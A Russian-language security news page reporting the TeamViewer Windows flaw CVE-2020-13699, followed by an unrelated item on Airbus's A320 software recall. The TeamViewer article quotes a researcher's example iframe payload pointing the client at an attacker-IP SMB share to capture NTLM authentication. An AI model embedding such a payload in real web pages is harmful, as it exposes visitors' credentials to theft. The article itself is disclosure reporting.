Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Баг в ПО привел к крупнейшему отзыву самолетов в истории авиации

Airbus объявил об отзыве около 6500 самолетов A320 из-за возможных сбоев в работе системы управления ELAC, возникающих при мощных солнечных вспышках. Поводом стала резкая потеря высоты во время рейса из мексиканского Канкуна в Ньюарк — лайнер совершил вынужденную посадку, и 15 пассажиров получили травмы.

Как сообщило агентство Reuters, решение об отзыве принято на основе расследования инцидента с самолетом A320 авиакомпании JetBlue.

Следствие установило, что причиной происшествия стало некорректное реагирование подсистемы ELAC на сильные солнечные вспышки. В результате система неверно интерпретировала движения штурвала. Производитель рекомендовал откатить обновление ПО L104 до предыдущей версии или заменить вычислительный модуль.

Под отзыв попали свыше 6000 самолетов A320. Авиакомпаниям Lufthansa, IndiGo, easyJet, JetBlue, American Airlines, Air France пришлось вывести из эксплуатации значительную часть парка, что вызвало массовые задержки и отмены рейсов в выходные. Только Air France в субботу отменила 35 рейсов.

В то же время IndiGo, easyJet, JetBlue и American Airlines самостоятельно произвели откат проблемного обновления — работа заняла всего несколько часов, что позволило избежать перебоев в расписании. Замена вычислительного модуля требуется только для наиболее старых самолетов.

«Предварительный анализ выпущенной директивы показал, что она не касается самолетов семейства Airbus A320, эксплуатируемых российскими авиакомпаниями», — заявил официальный представитель Росавиации Артем Кореняко.

По данным источника РБК в отрасли, «иммунитет» российских A320 связан с тем, что их программное обеспечение из-за санкций не обновлялось с 2022 года. Проблемное обновление L104 вышло только в 2024-м.

Ранее серьезные проблемы были выявлены и в бортовом ПО самолетов Boeing 737 Max. Они привели к запрету полетов и масштабным последствиям для производителя.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru